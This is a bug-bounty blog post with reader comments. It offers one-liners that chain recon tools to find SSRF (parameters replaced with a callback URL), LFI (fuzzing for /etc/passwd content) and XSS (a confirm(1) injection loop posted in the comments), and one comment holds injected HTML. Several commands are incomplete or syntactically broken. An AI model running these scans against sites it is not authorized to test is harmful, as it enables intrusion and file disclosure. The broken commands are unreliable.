Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace

Hello All

Today will see how you can find ssrf xss and lfi using gf , httpx , waybackurls , qsreplace , gau tool .

This will help you in bug bounty because it’s advance bug bounty tips i have also a YouTube channel please visit there and watch video on advance subdomain recon and subdomain takeover and some poc video is also there. So let’s start

XSS

First let’s start find xss for these we will use these tools gf , httpx , waybackurls , qsreplace , and command is like this :

This command will find xss in target domain .

SSRF

Now let’s see how we can find ssrf using these tools. Here is command to find SSRF on Target urls

findomain -t example.com -q | httpx -silent -threads 1000 | gau | grep “=” | qsreplace http://YOUR.burpcollaborator.net

Here it will Filter the possible parameter of ssrf and also will send the request to your collaborator.

LFI

Follow this command to find LFI

findomain -t example.com -q | waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done

Thanks

Tags: blind ssrf, bug bounty, bug bounty course, bug bounty hunter, bug bounty program, bug bounty reward, ethical hacking, facebook bug bounty, google bug bounty, hackerone bug bounty, inurl bug bounty, ssrf, ssrf attack, ssrf hackerone, ssrf labs, ssrf mitigation, ssrf spiritual, ssrf vulnerability, waybackurl, waybackurls, what is a bug bounty program, what is ssrf

This Post Has 23 Comments

Unknown April 27, 2021 Reply

Amezing bro thank you
Unknown April 27, 2021 Reply

nice one
Unknown April 27, 2021 Reply

<a href="https://youtu.be/cgZoVCQeAP0" style="color:red; background:yellow; >Dear sir your video and block artical is verry good. excilent. But <bold><center> this comment section is vurniable from xss </center></bold></a>
Unknown April 27, 2021 Reply

dear sir your vide
eo is amezing. thank you so much
Monu April 27, 2021 Reply

Thanks to all
Unknown April 27, 2021 Reply

Welcome
Computer Learning Tips April 29, 2021 Reply

Nyc
Amol May 21, 2021 Reply

Nice video
Unknown May 30, 2021 Reply

Dear sir your video and block artical is verry good. excilent.
Unknown May 30, 2021 Reply

this is xss
Unknown May 30, 2021 Reply

;
Unknown May 30, 2021 Reply

XSS
adnan July 2, 2021 Reply

cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”>confirm(1)’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “confirm(1)” && echo “$host 33[0;31mVulnerable\n”;done

bash: syntax error near unexpected token `<‘
please help me !!
1. Hack Tubehacktube July 2, 2021 Reply
  
  try another payload
2. mrblack December 8, 2021 Reply
  
  its because you have copy pasted cmnd directly from here
  
  use this command
  
  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”>confirm(1)’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “confirm(1)” && echo “$host \033[0;31mVulnerable\n”;done
Anil kumar August 23, 2021 Reply

zsh: parse error near `<‘
its showing this error
Anil kumar August 23, 2021 Reply

zsh: parse error near `<‘
cyrus November 24, 2021 Reply

Getting error while running the command ” no such pattern” pls somebody help
1. admin November 25, 2021 Reply
  
  Install patterns from github
dilip January 2, 2022 Reply

cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”>confirm(1)’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “confirm(1)” && echo “$host \033[0;31mVulnerable\n”;done
bash: syntax error near unexpected token `<‘
1. admin January 2, 2022 Reply
  
  change your payload
2. admin January 2, 2022 Reply
  
  change your payload and try again
Hargun Singh April 17, 2022 Reply

i have tried so many payload command is not working